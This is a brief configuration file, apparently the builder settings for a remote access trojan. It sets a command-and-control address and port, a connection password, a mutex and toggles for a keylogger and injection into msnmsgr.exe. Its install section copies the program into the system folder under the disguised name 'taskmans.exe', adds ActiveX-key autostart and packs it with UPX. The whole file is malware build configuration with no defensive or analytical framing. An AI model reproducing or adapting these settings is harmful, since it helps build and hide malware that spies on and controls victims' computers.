[Advanced]
PEbinary=1
PEc=0
PEd=0
PEp=0
PE=1
FileAlign=512
KeyLogger=0
InjectServer=0
Persistence=0
ProcessMutex=)!VoqA.I4
CustomInject=0
CustomInjectProc=msnmsgr.exe
[Connection]
Group=
HijackProxy=0
HijackProxyPersist=0
DNS=10.10.54.48:3460:0,
ID=111
Password=7950295
PasswordKey=0
Proxy=0
ProxyDNS=
[Install]
Startup=1
StartupHKLM=0
StartupActiveX=1
ActiveXKey={36FA79E6-40F7-EDAC-E0A7-AA70AD47F883}
HKLMName=
Copy=1
Filename=taskmans.exe
CopySystem=1
CopyWindows=0
ADS=0
Melt=0
[Build]
Icon=
bThirdParty=0
ThirdParty=upx.exe "%s"
